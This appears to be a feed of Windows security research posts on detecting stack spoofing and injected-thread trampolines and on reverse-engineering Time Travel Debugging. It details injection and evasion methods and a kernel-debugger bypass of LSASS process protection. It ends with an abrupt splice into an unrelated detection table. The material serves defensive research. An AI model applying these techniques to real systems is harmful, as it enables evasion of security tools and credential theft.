By comparing a traditional stack walk against its shadowy sibling, we can both detect and bypass thread stack spoofing. We present ShadowStackWalk, a PoC that implements CaptureStackBackTrace/StackWalk64 using the shadow stack to catch thread stack spoofing.
When the stack is normal, ShadowStackWalk functions similarly to CaptureStackBackTrace and StackWalk64:

ShadowStackWalk is unaffected by intentional breaks of the call stack such as ThreadStackSpoofer. Frames missed by other techniques are in green:

ShadowStackWalk doesn't care about forged stack frames. Incorrect frames are in red. Frames missed by other techniques are in green:

Limitations
Hardware support for HSP is limited. HSP requires at least an 11th-gen Intel or 5000-series Ryzen CPU, both released in late 2020. There is no software emulation. It will take years for the majority of CPUs to support HSP.
Software support for HSP is limited. Microsoft has been slowly rolling it out, even among their own processes. On an example Windows 10 22H2 workstation, it's enabled in roughly 40% of processes. Because HSP is an exploit mitigation, implementation will likely start with common exploitation targets like web browsers, though not all msedge.exe processes shown below are not protected by it. As HSP matures and support improves, non-HSP processes will become outliers worthy of additional scrutiny, similar to processes in 2023 without DEP support. For now, malware can simply choose processes without HSP enabled. Also of note is that HSP does not support WOW64 at all.

HSP was designed with an exploit mitigation threat model. It was never designed to defend against adversaries who have code execution, can change thread contexts, and perform system calls. In time, adversaries will adapt their call stack manipulations to manipulate the shadow stack as well. However, the fact that the shadow stack is user-RO and changing the SSP is privileged operation means that such tampering requires system calls which can (theoretically) be subjected to far more scrutiny than traditional stack tampering.
Conclusion
Today we discussed three potential benefits of Windows Hardware Stack Protection, and released a PoC demonstrating how it can be used to both detect and defeat defense evasions that manipulate the call stack.



Get-InjectedThreadEx – Detecting Thread Creation Trampolines
Wed, 07 Dec 2022 00:00:00 GMT
The prevalence of memory resident malware remains extremely high. Defenders have imposed significant costs on file-based techniques, and malware must typically utilize in-memory techniques to avoid detection. In Elastic's recently-published Global Threat Report, defense evasion is the most diverse tactic we observed and represents an area of rapid, continuous innovation.
It is convenient, and sometimes necessary, for memory-resident malware to create its own threads within its surrogate process. Many such threads can be detected with relatively low noise by identifying those which have a start address not backed by a Portable Executable (PE) image file on disk. This detection technique was originally conceived by Elastic's Gabriel Landau and Nicholas Fritts for the Elastic Endgame product. Shortly thereafter, it was released as a PowerShell script for the benefit of the community in the form of Get-InjectedThread with the help of Jared Atkinson and Elastic's Joe Desimone at the 2017 SANS Threat Hunting and IR Summit.
At a high level, this approach detects threads created with a user start address in unbacked executable memory. Unbacked executable memory itself is quite normal in many processes such as those that do just-in-time (JIT) compilation of bytecode or scripts like .NET or javascript. However, that JIT’d code rarely manages its own threads – usually that is handled by the runtime or engine.

However, an adversary often has sufficient control to create a thread with an image-backed start address which will subsequently transfer execution to their unbacked memory. When this transfer is done immediately, it is known as a “trampoline” as you are quickly catapulted somewhere else.
There are four broad classes of trampolines – you can build your own from scratch, you can use an illusionary trampoline, you can repurpose something else as a trampoline, or you can simply find an existing trampoline.
In other words - hooks, hijacks, gadgets and functions.
Each of these will bypass our original unbacked executable memory heuristic.
I highly recommend these two excellent blogs as background:

Understanding and Evading Get-InjectedThread by Adam Chester.
Avoiding Get-InjectedThread for Internal Thread Creation by Christopher Paschen.

In this blog, we will demonstrate how to detect each of these classes of bypass and release an updated PowerShell detection script – Get-InjectedThreadEx.
CreateThread() overview
As a quick recap, the Win32 CreateThread() API lets you specify a pointer to a desired StartAddress which will be used as the entrypoint of a function that takes exactly one user-provided parameter.

So, CreateThread() is effectively a simple shellcode runner.

And its sibling, CreateRemoteThread() is effectively remote process injection.
The value of the lpStartAddress parameter is stored by the kernel in the Win32StartAddress field within the ETHREAD structure for that thread.

This value can be queried from user mode using the documented NtQueryInformationThread() syscall with the ThreadQuerySetWin32StartAddress information class. A subsequent call to VirtualQueryEx() can be used to make a second syscall requesting the basic memory information for that virtual address from the kernel. This includes an enumeration indicating whether the memory is a mapped PE image, a mapped file, or simply private memory.

While the original script was a point-in-time retrospective detection implementation, the same information is available inline during create thread notify kernel callbacks. All effective Endpoint Detection and Response (EDR) products should be providing telemetry of suspicious thread creations.
And all effective Endpoint Protection Platform (EPP) products should be denying suspicious thread creations by default – with a mechanism to add allowlist entries for legitimate software exhibiting this behavior.
In the wild, you’ll see “legitimate” instances of this behavior such as from other security products, anti-cheat software, older copy-protection software and some Unix products that have been shimmed to work on Windows. Though, in each instance, this security code smell may be indicative of software that you might not want in an enterprise environment. The use of these methods may be a leading indicator that other security best practices have not been followed. Even with this finite set of exceptions to handle, this detection and/or prevention approach remains highly relevant and successful today.
1 - Bring your own trampoline
The simplest trampoline is a small hook. The adversary only needs to write the necessary jump instruction into existing image-backed memory. This is the approach that Filip Olszak used to bypass Get-InjectedThread with DripLoader.
These bytes can even be restored to their original values immediately after thread creation. This helps to avoid retrospective detections such as our script – but recall that your endpoint security product should be doing inline detection and will be able to scrutinize the hooked thread entrypoint at execution time, and deny execution if necessary.

The above proof-of-concept hooks ntdll!DbgUiRemoteBreakin, which is a legitimate remote thread start address, though it should rarely be seen in production environments. In practice, the hook can be placed on any function bytes unlikely to be called in normal operation– or even slack space between functions, or at the end of the PE section.
Also note the use of WriteProcessMemory() instead of a simple memcpy(). MEM_IMAGE pages are typically read only, and the former handles toggling the page protections to writable and back for us.
We can detect hooked start addresses fairly easily because we can detect persistent inline hooks fairly easily. In order to save memory, allocations for shared libraries use the same backing physical memory pages and are marked COPY_ON_WRITE in each process’s address space. So, as soon as the hook is inserted, the whole page can no longer be shared. Instead, a copy is created in the working set of the process.
Using the QueryWorkingSetEx() API, we can query the kernel to determine whether the page containing the start address is sharable or is in a private working set.
Now we know that something on the page was modified – but we don’t know if our address was hooked. And, for our updated PowerShell script, this is all that we do. Recall that the bytes can be unhooked after the thread has started– so any further checks on already running threads could result in a false negative.
However, this could also be a false positive if there is a “legitimate” hook or other modification.
In particular, many, many security products still hook ntdll.dll. This was an entirely legitimate technical approach back in 2007 when Vista was released: it allowed existing x86 features based on kernel syscall hooks to be quickly ported to the nascent x64 architecture using user mode syscall hooks instead. The validity of such approaches has been more questionable since Windows 10 was released in 2015. Around this time, x64 was cemented as the primary Windows architecture and we could firmly relegate the less secure x86 Windows to legacy status. The value proposition for user mode hooking was further reduced in 2017 when Windows 10 Creators Update added additional kernel mode instrumentation to provide more robust detection approaches for malicious usage of certain abused syscalls.
For reference, our original Elastic Endgame product has features implemented using user mode hooks whereas our newer Elastic Endpoint has not yet determined a need to use a user mode hook at all in order to attain equal or better protection compared to Endgame. This means that Elastic Endgame must defend these hooks from tampering whereas Elastic Endpoint is currently invulnerable to the various so-called “universal EDR bypasses” that perform ntdll.dll unhooking.
Older security products aside, there are also many products that extend the functionality of other products via hooks– or perhaps unpack their code at runtime, etc. So, if that 4KB page is private, then security products need to additionally compare the start address bytes to an original pristine copy and alert if they differ.
And, to deploy at scale, they also need to maintain an allowlist for those rare legitimate uses.
2 - Shifting the trampoline mat
Technically the security product will only be able to see the bytes at the time of the thread notification callback which is slightly before the thread executes. Malware could create a suspended thread, let the thread callback execute, and only then hook the start bytes before finally resuming the thread. Don’t worry though - effective security products can detect that inline too. But that’s a topic for another day.
This brings us to the second trampoline approach though: hijacking the execution flow before the entrypoint is ever called. Why obviously hook the thread entrypoint of our suspended thread when, with a little sleight of hand, we can usurp execution by modifying its instruction pointer directly (or an equivalent context manipulation) with SetThreadContext(), or by queuing an “early bird” Asynchronous Procedure Call (APC)?
The problem with creating the illusion of a legitimate entrypoint like this is that it doesn’t hold up to any kind of rigorous inspection.
In a normal thread, the user mode start address is typically the third function call in the thread’s stack – after ntdll!RtlUserThreadStart and kernel32!BaseThreadInitThunk. So when the thread has been hijacked, this is going to be obvious in the call stack.
For instruction pointer manipulation, the first frame will belong to the injected code.
For “early bird” APC injection, the base of the call stack will be ntdll!LdrInitializeThunk, ntdll!NtTestAlert, ntdll!KiUserApcDispatcher and then the injected code.
The updated script detects various anomalous call stack bases.
False positives are possible where legitimate software finds it necessary to modify Windows process or thread initialisation. For example, this was observed with the MSYS2 Linux environment. There is also an edge case where a function might have been generated with a Tail Call Optimisation (TCO), which eliminates unnecessary stack frames for performance. However, these cases can all be easily handled with a small exception list.
3 - If it walks like a trampoline, and it talks like a trampoline...
The third trampoline approach is to find a suitable gadget within image-backed memory so that no code modification is necessary. This is one of the approaches that Adam Chester employed in his blog.
Our earlier hook was 12 bytes and finding an exact 12-byte gadget is unlikely in practice.
However, on x64 Windows, functions use a four-register fast-call calling convention by default. So when the OS calls our gadget we will have control over the RCX register which will contain the parameter we passed into CreateThread().
The simplest x64 gadget is the two-byte JMP RCX instruction “ff e1” – which is fairly trivial to find.

Gadgets don’t even need to be instructions per se – they could be within operands or other data in the code section. For example, the above “ff e1” gadget in ntdll.dll was part of the relative address of a GUID.
We can detect this too- because it doesn’t work generically yet.
In all modern Windows software, thread start addresses are protected by Control Flow Guard (CFG) which has a bitmap of valid indirect call targets computed at compile time. In order to use this gadget, malware must either first disable CFG or call the SetProcessValidCallTargets() function to ask the kernel to dynamically set the bit corresponding to this gadget in the CFG bitmap.
Just to be clear: this is not a CFG bypass. It is a CFG feature to support legitimate software doing weird things. Remember that CFG is an exploit protection– and being able to call SetProcessCallTargets() in order to call CreateThread() is a chicken and egg problem for exploit developers.
Like before, to save memory, the CFG bitmap pages for DLLs are also shared between processes. This time we can detect whether the start address’s CFG bitmap entry is on a sharable page or in a private working set- and alert if it is private.
Control Flow Guard is described in detail elsewhere, but a high level CFG overview here is helpful to understanding our approach to detection. Each two bits in the CFG bitmap corresponds to 16 addresses. Two bits gives us four states. Specifically, in a pretty neat optimization by Microsoft, two states correspond only to the 16-byte aligned address (allowed, and export suppressed) and two states correspond to all 16 addresses (allowed and denied).
Modern CPUs fetch instructions in 16-byte lines so modern compilers typically align the vast majority of function entrypoints to 16-bytes. The vast majority of CFG entries only set a single address as a valid indirect call target, and very few entries will specify a whole block of 16 addresses as valid call targets. This means that the CFG bitmap can be an eighth of the size without any appreciable increase in the risk of valid gadgets due to an overly permissive bitmap.
However, if each two bits corresponds to 16 addresses, then a private 4K page of CFG bits corresponds to 256KB of code. That’s quite the false positive potential!
Therefore, we just have to hope that legitimate code never does this… nevermind. You should never hope that legitimate code won’t do obscure things. To date, we’ve identified three contemporary scenarios:

The legacy Edge browser would harden its javascript host process by un-setting CFG bits for certain abusable functions
user32.dll appears to be too kind to legacy software – and will un-suppress export addresses if they are registered as call back functions
Some security products will drop a page of hook trampolines too close to legitimate modules and private executable memory always has private bitmap entries (Actually they’ll often drop this at a module’s preferred load address – which prevents the OS from sharing memory for that module)

So we need to rule out false positives by comparing against an expected CFG bitmap value. We could read this from the PE file on disk, but the x64 bitmap is already mapped into our process as part of the shared CFG bitmap.
The PowerShell script implementation we’ve released alerts on both cases: a modified CFG page and a start address with a non-original CFG value.
A very small number of CFG-compatible gadgets might exist at a given point in time, but only in very specific DLLs that will likely appear anomalous in the surrogate process.
4 - It's literally already a trampoline
The third bypass category is to find an existing function that does exactly what we want, and there are many of these. For example, the one highlighted by Christopher Paschen is Microsoft’s C Runtime (CRT). This implementation of the C standard library works as an API layer that sits above Win32– and it includes thread creation APIs.
These APIs perform some extra CRT bookkeeping on thread creation/destruction by passing an internal CRT thread entrypoint to CreateThread() and by passing the user entrypoint to subsequently call as part of the structure pointed to by the CreateThread() parameter.
So, in this case, the Win32StartAddress observed will be the non-exported msvcrt!_startthread(ex). The shellcode address will be at a specific offset from the thread parameter during thread creation (Microsoft CRT source is available), and the shellcode will be the next frame on the call stack after the CRT.
Note: without additional tricks this can only be used to create in-process threads and there is no CreateRemoteThread() equivalent. Those tricks exist, however, and you should not expect this module as a start address in remote threads.
Unfortunately, there is no operating system bookkeeping that will tell you if a thread was created remotely after the fact. Consequently, we can’t scan for this with our script– but the inline callbacks used by security products can make this distinction.
Currently, the script simply traverses the stack bottom-up and infers the first handful of frames by looking at candidate return addresses. This code could definitely be improved via disassembly or using unwind information, which are less rewarding to implement in PowerShell. The current approach is reliable enough for demonstration purposes:


The updated script detects the original suspicious thread in addition to the four classes of bypass described in this research.
Hunting suspicious thread creations
In addition to detections for the four known major classes of thread start address trampolines, the updated script also includes some additional heuristics. Some of these have medium false positive rates and are hidden behind an -Aggressive flag. However, they may still be useful in hunting scenarios.
![prolog byte regex](/assets/images/get-injectedthreadex-detection-thread-creation-trampolines/image14.png
The first looks at the starting bytes of the thread’s user entrypoint. Function prologs have structure- except when they don’t. There is no decompiler in PowerShell as far as we know – so we approximated with a byte pattern regular expression instead. Identifying code that doesn’t follow convention is useful but could easily exist in a compiler that we haven’t tested against.
Interestingly, we had to account for the “MZ” magic bytes that correspond to a DOS Executable being a purportedly valid thread entrypoint. The Windows loader ignores the value of the AddressOfEntry field in the PE header for Common Language Runtime (CLR) executables such as .NET.
Instead, execution always starts in MsCorEE!_CorExeMain() in the CLR Runtime which determines the actual process entrypoint from the CLR metadata. This makes sense as CLR assembly might only contain bytecode which needs to be JIT’d by the runtime before being called. However, the value of this field is still passed to CreateThread() and it is often zero- which results in the unexpected MZ entrypoint bytes.

The second heuristic examines the bytes immediately preceding the user entrypoint. This is usually a return, a jump, or a filler byte. Common filler bytes are zero, nop, and int 3. However, this is only a convention.
In particular, older compilers would regularly place data side by side with code- presumably to achieve performance through data locality. For example, we previously analysed the x64 binaries on Microsoft’s symbol server and noticed that this mixing of code and data was normal in Visual Studio 2012, was mostly remediated in VS2013, and appears to have been finally fixed in VS2015 Update 2.

The third heuristic is yet another compiler convention. As mentioned earlier, compilers like to output functions that maximize the instruction cache performance which typically use 16-byte fetches. But compilers appear to also like to save space– so they typically only ensure that the first basic block fits within the smallest number of 16-byte lines as opposed to strict 16-byte alignment. In other words, if a basic block is 20 bytes then it’ll always need at least two fetches, but we want to ensure that it doesn’t need three.

Many common Win32 modules have no valid thread entrypoints at all– so check for these.
This list is definitely non-exhaustive.
Kernel32.dll is a special case. LoadLibrary is not technically a valid thread entrypoint– but CreateRemoteThread(kernel32!LoadLibraryA, “signed.dll”) is actually how most security products would prefer software to do code injection into running processes when necessary. That is, the injected code is signed and loaded into read-only image-backed memory. To the best of our knowledge, we believe that this approach was first proposed by Jeffrey Richter in an article in the May 1994 edition of the Microsoft System Journal and later included in his Advanced Windows book. So treat LoadLibrary as suspicious- but not necessarily malicious.
 ntdll.dll is loaded everywhere so is often the first choice for a gadget or hook. There are only four valid ntdll entrypoints that we know of and the script explicitly checks for these.
Two of these functions aren’t exported, and rather than using P/Invoke to download the public symbols and find the offset in the PDB, the script dynamically queries the start addresses of its own threads for their start addresses to find these. PowerShell already uses worker threads, and the script starts a private ETW logger session to force a thread with the final address.
 Side-loaded DLLs remain a highly popular technique- and are still predominantly unsigned.

This one isn’t a thread start heuristic- but it was too simple not to include. Legitimate threads might impersonate SYSTEM briefly, but (lazy) malware authors (or operators) tend to escalate privileges initially and hold them indefinitely.
Wrapping up
As flagged last time, nothing in security is a silver bullet. You should not expect 100% detection from suspicious thread creations alone.
For example, an adversary could modify their tools to simply not create any new threads, restricting their execution to hijacked threads only. The distinction is perhaps subtle, but Get-InjectedThreadEx only attempts to detect anomalous thread creation addresses – not the broader case of legitimate threads that were subsequently hijacked. This is why, in addition to imposing costs at thread creation, Elastic Security employs other defensive layers including memory signatures, behavioral detections and defense evasion detections.
While it is somewhat easy to hijack a single thread after creation (ensuring that all your malware’s threads, including any third-party payloads, uses the right version of the right detection bypass for the installed security products), this is a maintenance cost for the adversary and mistakes will be made.
Let’s keep raising the bar. We’d love to hear about thread creation bypasses- and scalable detection approaches. We’re stronger together.



Deep dive into the TTD ecosystem
Wed, 30 Nov 2022 00:00:00 GMT
Several times a year, Elastic Security Labs researchers get the freedom to choose and dig into projects of their liking — either alone or as a team. This time is internally referred to as “On-Week” projects. This is the first in a series focused on the Time Travel Debugging (TTD) technology developed by Microsoft that was explored in detail during a recent On-Week session.
Despite being made public for several years, awareness of TTD and its potential are greatly underrated within the infosec community. We hope this two-part series can help shed some light on how TTD can be useful for program debugging, vulnerability research and exploitation, and malware analysis.
This research involved first understanding the inner workings of TTD and then assessing some interesting applicable uses that can be made out of it. This post will focus on how researchers dive deep into TTD, sharing their methodology along with some interesting findings. The second part will detail the applicable use of TTD for the purpose of malware analysis and integration with Elastic Security.
Background
Time Travel Debugging is a tool developed by Microsoft Research that allows users to record execution and navigate freely into the user-mode runtime of a binary. TTD itself relies on two technologies: Nirvana for the binary translation, and iDNA for the trace reading/writing process. Available since Windows 7, TTD internals were first detailed in a publicly available paper. Since then, both Microsoft and independent researchers have covered it in great detail. For this reason, we won’t explore the internals of both technologies in depth. Instead, Elastic researchers investigated the ecosystem — or the executables, DLLs, and drivers — that make the TTD implementation work. This led to some interesting findings about TTD, but also Windows itself, as TTD leverages some (undocumented) techniques to work as intended in special cases, such as Protected Processes.
But why investigate TTD at all? Aside from pure curiosity, it is likely that one of the possible intended uses for the technology would be discovering bugs in production environments. When bugs are hard to trigger or reproduce, having a “record-once-replay-always” type of environment helps compensate for that difficulty, which is exactly what TTD implements when coupled with WinDbg.
Debugging tools such as WinDbg have always been an immense source of information when reversing Windows components, as they provide additional comprehensible information, usually in plain text. Debugging tools (especially debuggers) must cooperate with the underlying operating system, which could involve debugging interfaces and/or previously undisclosed capabilities from the OS. TTD conforms to that pattern.
High-level overview
TTD works by first creating a recording that tracks every instruction executed by an application and stores it in a database (suffixed with .run). Recorded traces can be replayed at will using the WinDbg debugger, which on first access will index the .run file, allowing for faster navigation through the database. To be able to track execution of arbitrary processes, TTD injects a DLL responsible for recording activity on-demand which allows it to record processes by spawning them, but also may attach to an already-running process.
TTD is freely downloadable as part of the WinDbg Preview package in the MS Store. It can be used directly from WinDbg Preview (aka WinDbgX), but is a standalone component that is located in C:\Program Files\WindowsApps\Microsoft.WinDbg____8wekyb3d8bbwe\amd64\ttd for the x64 architecture, which we will focus on in this post. x86 and arm64 versions are also available for download in the MS Store.
The package consists of two EXE files (TTD.exe and TTDInject.exe) and a handful of DLLs. This research focuses on the major DLL responsible for everything not related to Nirvana/iDNA (i.e. responsible for the session management, driver communication, DLL injection, and more): ttdrecord.dll
_Note: Most of this research was made using two versions of the ttdrecord DLL: mostly on a 2018 version (1.9.106.0 SHA256=aca1786a1f9c96bbe1ea9cef0810c4d164abbf2c80c9ecaf0a1ab91600da6630), and early 2022 version (10.0.19041.1 SHA256=1FF7F54A4C865E4FBD63057D5127A73DA30248C1FF28B99FF1A43238071CBB5C). The older versions were found to have more symbols, which helped speed up the reverse engineering process. We then re-adapted structures and function names to the most recent version. Therefore, some of the structures explained here might not be the same if you’re trying to reproduce on more recent versions. _
Examining TTD features
Command line parameters
Readers should note that TTD.exe acts essentially as a wrapper to ttdrecord!ExecuteTTTracerCommandLine:
HRESULT wmain()
{
v28 = 0xFFFFFFFFFFFFFFFEui64;
hRes = CoInitializeEx(0i64, 0);
if ( hRes >= 0 )
{
ModuleHandleW = GetModuleHandleW(L"TTDRecord.dll");
[...]
TTD::DiagnosticsSink::DiagnosticsSink(DiagnosticsSink, &v22);
CommandLineW = GetCommandLineW();
lpDiagnosticsSink = Microsoft::WRL::Details::Make(&v31, DiagnosticsSink);
hRes = ExecuteTTTracerCommandLine(*lpDiagnosticsSink, CommandLineW, 2i64);
[...]

The final line of the code excerpt above shows a call to ExecuteTTTracerCommandLine , which takes an integer as the last argument. This argument corresponds to the desired tracing modes, which are: - 0 -> FullTracingMode, - 1 -> UnrestrictedTracing and - 2 -> Standalone (the hardcoded mode for the public version of TTD.exe)
Forcing TTD to run in full-tracing mode reveals available options, which include some hidden capabilities such as process reparenting (-parent) and automatic tracing until reboot (-onLaunch) for programs and services.
Dumping the complete option set of TTDRecord.dll revealed interesting hidden command line options such as:
-persistent Trace programs or services each time they are started (forever). You must specify a full path to the output location with -out.
-delete Stop future tracing of a program previously specified with -onLaunch or -persistent. Does not stop current tracing. For -plm apps you can only specify the package (-delete ) and all apps within that package will be removed from future tracing
-initialize Manually initialize your system for tracing. You can trace without administrator privileges after the system is initialized.

The process of setting up Nirvana requires TTD to set up the InstrumentationCallback field in the target _EPROCESS. This is achieved through the (undocumented but known) NtSetInformationProcess(ProcessInstrumentationCallback) syscall (ProcessInstrumentationCallback, which has a value of 40). Due to the potential security implication, invoking this syscall requires elevated privileges. Interestingly, the -initialize flag also hinted that TTD could be deployed as a Windows service. Such service would be responsible for proxying tracing requests to arbitrary processes. This can be confirmed by executing it and seeing the resulting error message:

Even though it is easyto find evidence confirming the existence of TTDService.exe , the file was not provided as part of the public package, so aside from noting that TTD can run as a service, we will not cover it in this post.
TTD process injection
As explained, a TTD trace file can either be created from the standalone binary TTD.exe or through a service TTDService.exe (private), both of which must be run in a privileged context. However, those are just launchers and injecting the recording DLL (named TTDRecordCPU.dll) is the job of another process: TTDInject.exe.
TTDInject.exe is another executable noticeably larger than TTD.exe, but with a pretty simple objective: prepare the tracing session. In an overly simplified view, TTD.exe will first start the process to be recorded in a suspended state. It will then spawn TTDInject.exe, passing it all the necessary arguments to prepare the session. Note that TTDInject can also spawn the process directly depending on the tracing mode we mentioned earlier — therefore, we are describing the most common behavior (i.e. when spawned from TTD.exe).

TTDInject will create a thread to execute TTDLoader!InjectThread in the recorded process, which after various validations will in turn load the library responsible for recording all process activity, TTDRecordCPU.dll.

From that point onward, all instructions, memory accesses, exceptions triggered, or CPU states encountered during the execution will be recorded.
Once the general workflow of TTD was understood, it became clear that little to no manipulation is possible after the session initialization. Thus, further attention was paid to the arguments supported by ttdrecord.dll. Thanks to the C++ mangling function format, a lot of critical information can be retrieved from the function names themselves, which makes analyzing the command line argument parser relatively simple. One interesting flag that was discovered was PplDebuggingToken. That flag is hidden and only available in Unrestricted Mode.

The existence of this flag immediately raised questions: TTD was architected first around Windows 7 and 8, and on Windows 8.1+. The concept of Protection Level was added to processes, dictating that processes can only open handles to a process with a Protection Level that is equal or inferior. It is a simple byte in the _EPROCESS structure in the kernel, and thus not directly modifiable from user mode.

The values of the Protection Level byte are well known and are summarized in the table below.

The Local Security Authority subsystem (lsass.exe) on Windows can be configured to run as Protected Process Light, which aims to limit the reach of an intruder who gains maximum privileges on a host. By acting at the kernel level, no user-mode process can open a handle to lsass, no matter how privileged.

But the PplDebuggingToken flag appears to suggest otherwise. If such a flag existed, it would be the dream of any pentester/red teamer: a (magic) token that would allow them to inject into protected processes and record them, dump their memory or more. The command line parser seems to imply that the content of the command flag is a mere wide-string. Could this be a PPL backdoor?
Chasing after the PPL debugging token
Returning to ttdrecord.dll, the PplDebuggingToken command line option is parsed and stored in a context structure along with all of the options required to create the TTD session. The value can be traced down to several locations, with an interesting one being within TTD::InitializeForAttach, whose behavior is simplified in the following pseudo-code:
ErrorCode TTD::InitializeForAttach(TtdSession *ctx)
{
  [...]
  EnableDebugPrivilege(GetCurrentProcess()); // [1]
  HANDLE hProcess = OpenProcess(0x101040u, 0, ctx->dwProcessId);
  if(hProcess == INVALID_HANDLE_VALUE)
 {
    goto Exit;
  }
  [...]
  HMODULE ModuleHandleW = GetModuleHandleW(L"crypt32.dll");
  if ( ModuleHandleW )
  pfnCryptStringToBinaryW = GetProcAddress(ModuleHandleW, "CryptStringToBinaryW"); // [2]

  if ( ctx->ProcessDebugInformationLength ) // [3]
  {
DecodedProcessInformationLength = ctx->ProcessDebugInformationLength;
DecodedProcessInformation = std::vector(DecodedProcessInformationLength);
wchar_t* b64PplDebuggingTokenArg = ctx->CmdLine_PplDebugToken;
if ( *pfnCryptStringToBinaryW )
{
  if( ERROR_SUCCESS == pfnCryptStringToBinaryW( // [4]
                      b64PplDebuggingTokenArg,
                      DecodedProcessInformationLength,
                      CRYPT_STRING_BASE64,
                      DecodedProcessInformation.get(),
                      &DecodedProcessInformationLength,
                      0, 0))
  {
    Status = NtSetInformationProcess( // [5]
               NtGetCurrentProcess(),
               ProcessDebugAuthInformation,
               DecodedProcessInformation.get(),
               DecodedProcessInformationLength);
  }
[...]

After enabling the SeDebugPrivilege flag for the current process ([1]) and obtaining a handle to the process to attach to ([2]), the function resolves an exported generic function used to perform string operations: crypt32!CryptStringToBinaryW. In this instance, it is used for decoding the base64-encoded value of the PplDebuggingToken context option if it was provided by the command line( [3], [4]). The decoded value is then used to invoke the syscall NtSetInformationProcess(ProcessDebugAuthInformation) ([5]). The token doesn’t seem to be used anywhere else, which made us scrutinize that syscall.
The process information class ProcessDebugAuthInformation was added in RS4. A quick look at ntoskrnl shows that this syscall simply passes the buffer to CiSetInformationProcess located in ci.dll, which is the Code Integrity driver DLL. The buffer is then passed to ci!CiSetDebugAuthInformation with fully controlled arguments.

The following diagram summarizes at a high level where this happens in the execution flow of TTD.

The execution flow in CiSetDebugAuthInformation is simple enough: the buffer with the base64-decoded PplDebuggingToken and its length are passed as arguments for parsing and validation to ci!SbValidateAndParseDebugAuthToken. Should the validation succeed, and after some extra validation, a handle to the process performing the syscall (remember that we’re still handling the syscall nt!NtSetInformationProcess) will be inserted in a process debug information object then stored in a global list entry.

But how is that interesting? Because this list is only accessed in a single location: in ci!CiCheckProcessDebugAccessPolicy, and this function is reached during a NtOpenProcess syscall. And, as the name of the newly discovered flag suggested earlier, any process whose PID is located in that list would bypass the Protection Level enforcement. This was confirmed practically in a KD session by setting an access breakpoint on that list (on our version of ci.dll this was located at ci+364d8). We also enabled PPL on LSASS and wrote a simple PowerShell script that would trigger a NtOpenProcess syscall:

By breaking at the call to nt!PsTestProtectedProcessIncompatibility in nt!PspProcessOpen, we can confirm that our PowerShell process attempts to target lsass.exe, which is a PPL process:

Now to confirm the initial theory of what the PplDebuggingToken argument would do by forcing the return value of the call to nt!PsTestProtectedProcessIncompatibility:

We break at the instruction following the call to nt!PsTestProtectedProcessIncompatibility (which only calls CI!CiCheckProcessDebugAccessPolicy), and force the return value to 0 (as mentioned earlier a value of 1 means incompatible):

Success! We obtained a handle to LSASS despite it being PPL, confirming our theory. Summarizing, if we can find a “valid value” (we’ll dig into that soon) it will pass the check of SbValidateAndParseDebugAuthToken() in ci!CiSetDebugAuthInformation(), and we would have a universal PPL bypass. If this sounds too good to be true, that’s mostly because it is — but confirming it requires developing a better understanding of what CI.dll is doing.
Understanding Code Integrity policies
Restrictions based on code integrity, such as those used by AppLocker, can be enforced through policies, which in their human readable form are XML files. There are two types of policies: base and supplemental. Examples of what base policies look like can be found in their XML format in "C:\Windows\schemas\CodeIntegrity\ExamplePolicies". This is what a Base Policy looks like in its XML form (taken from "C:\Windows\schemas\CodeIntegrity\ExamplePolicies\AllowAll.xml"), which reveals most of the details we’re interested in clearly in plaintext.


1.0.1.0
{A244370E-44C9-4C06-B551-F6016E563076}
{A244370E-44C9-4C06-B551-F6016E563076}
{2E07F7E4-194C-4D20-B7C9-6F44A6C5A234}

API event	Description
`cross-process`	The observed activity was between two processes.
`native_api`	A call was made directly to the undocumented Native API rather than the supported Win32 API.
`direct_syscall`	A syscall instruction originated outside of the Native API layer.
`proxy_call`	The call stack appears to show a proxied API call to masking the true caller.
`sensitive_api`	Executable non-image memory is unexpectedly calling a sensitive API.
`shellcode`	Suspicious executable non-image memory is calling a sensitive API.
`image-hooked`	An entry in the call stack appears to have been hooked.
`image_indirect_call`	An entry in the call stack was preceded by a call to a dynamically resolved function.
`image_rop`	An entry in the call stack was not preceded by a call instruction.
`image_rwx`	An entry in the call stack is writable.
`unbacked_rwx`	An entry in the call stack is non-image and writable.
`allocate_shellcode`	A region of non-image executable memory suspiciously allocated more executable memory.
`execute_fluctuation`	The PAGE_EXECUTE protection is unexpectedly fluctuating.
`write_fluctuation`	The PAGE_WRITE protection of executable memory is unexpectedly fluctuating.
`hook_api`	A change to the memory protection of a small executable image memory region was made.
`hollow_image`	A change to the memory protection of a large executable image memory region was made.
`hook_unbacked`	A change to the memory protection of a small executable non-image memory was made.
`hollow_unbacked`	A change to the memory protection of a large executable non-image memory was made.
`guarded_code`	Executable memory was unexpectedly marked as PAGE_GUARD.
`hidden_code`	Executable memory was unexpectedly marked as PAGE_NOACCESS.
`execute_shellcode`	A region of non-image executable memory was executed in an unexpected fashion.
`hardware_breakpoint_set`	A hardware breakpoint was potentially set.